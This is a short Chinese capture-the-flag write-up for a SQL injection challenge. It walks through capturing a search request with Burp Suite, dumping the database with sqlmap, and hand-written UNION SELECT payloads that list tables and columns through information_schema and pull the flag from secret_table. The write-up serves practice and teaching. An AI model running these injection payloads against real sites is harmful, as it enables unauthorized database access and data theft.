题目
WP
在searchnew中随意输入字符串,burpsuite抓包
发现输入的字符串以post形式提交给了search参数
将http请求打包,用sqlmap探测search参数是否存在sql注入风险
注入成功
接下来直接将后台数据库直接输出
sqlmap -r searech -p search --dump
找到flag啦~
手动注入:
发现哪一列可以回显
打印数据库的表
search=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
查看secret_table
0' union select 1,group_concat(column_name separator ';'),3 from information_schema.columns where table_name='secret_table' --+
发现fl4g,查询fl4g
search=0' union select 1,group_concat(fl4g separator ';'),3 from secret_table --+